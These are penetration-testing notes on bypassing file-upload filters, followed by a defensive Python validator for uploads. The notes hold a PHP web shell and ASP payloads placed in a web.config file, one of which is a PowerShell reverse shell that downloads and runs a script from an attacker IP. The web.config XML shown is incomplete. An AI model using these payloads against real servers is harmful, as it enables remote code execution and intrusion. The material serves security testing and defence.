Business Logic Testing

File Upload


Bypassing Filters

Enumerate Allowed Extensions:

Truncating File-Name

Append Allowed Extension

  • file.php.png


  • Check allowed file size

  • Check allowed extensions

  • Check Content-Type Header

Content-Disposition: form-data; name="myFile"; filename="test.php.png"

Content-Type: image/png


<?php system($_GET['cmd']); ?>

IIS Web Servers

A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.

  • Upload ASP code within a web.config file.

  • Ensure each line of the ASP payload code is on a new line.

#Save as Web.config
<?xml version="1.0" encoding="UTF-8"?>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
               <remove fileExtension=".config" />
               <remove segment="web.config" />
<!-- Insert ASPX Code Here -->
#Payload to test for code execution. This will output sum(1+2)

#Test for whoami
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()

#Payload to test for ping callback
Set rs = CreateObject("WScript.Shell") 
Set cmd = rs.Exec("cmd /c ping") 
o = cmd.StdOut.Readall() 

tcpdump -i tun0 icmp

#Reverse shell
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('<IP>/shell.ps1')")
o = cmd.StdOut.Readall()
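
Server-side checks that close the cases listed on this page (appended allowed extension, client-supplied Content-Type, uploaded web.config), as an added example that is not part of the original notes. The policy (image uploads only, the size and name limits) and the names check_upload and storage_name are assumptions for illustration.

```python
import os
import secrets

# Assumed policy for this sketch: image uploads only, 2 MiB maximum.
ALLOWED = {  # extension -> (leading magic bytes, expected Content-Type)
    ".png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    ".jpg": (b"\xff\xd8\xff", "image/jpeg"),
    ".gif": (b"GIF8", "image/gif"),
}
# Extensions a web server may pass to a script engine or read as configuration.
ACTIVE = {".php", ".phtml", ".phar", ".asp", ".aspx", ".ashx", ".jsp", ".config", ".htaccess"}
MAX_BYTES = 2 * 1024 * 1024
MAX_NAME = 100


def check_upload(filename, content_type, data):
    """Return the reasons to reject an upload; an empty list means accept."""
    reasons = []
    # Final path component only, cut at a NUL byte, trailing dots/spaces removed.
    name = os.path.basename(filename.replace("\\", "/")).split("\x00")[0]
    name = name.rstrip(" .").lower()
    exts = ["." + part for part in name.split(".")[1:]]
    if len(data) > MAX_BYTES:
        reasons.append("file too large")
    if len(filename) > MAX_NAME:
        reasons.append("file name too long")
    if any(e in ACTIVE for e in exts):  # every extension, so file.php.png fails
        reasons.append("active extension in name")
    if not exts or exts[-1] not in ALLOWED:
        reasons.append("final extension not on allow-list")
        return reasons
    magic, mime = ALLOWED[exts[-1]]
    if content_type != mime:
        reasons.append("Content-Type does not match extension")
    if not data.startswith(magic):  # the header is client-supplied; the bytes decide
        reasons.append("content does not match declared type")
    if b"<?php" in data.lower():  # heuristic only; re-encoding the image is stronger
        reasons.append("PHP open tag in content")
    return reasons


def storage_name(ext):
    """Server-generated name, so the client's file name never reaches the disk."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed inputs mirroring the request shown on this page.
    print(check_upload("test.php.png", "image/png", b"<?php echo 1; ?>"))
    print(check_upload("web.config", "text/xml", b"<?xml version='1.0'?>"))
    print(check_upload("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32))
```

Accepted files should be written under storage_name() to a directory the web server does not execute scripts from and does not read configuration from.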
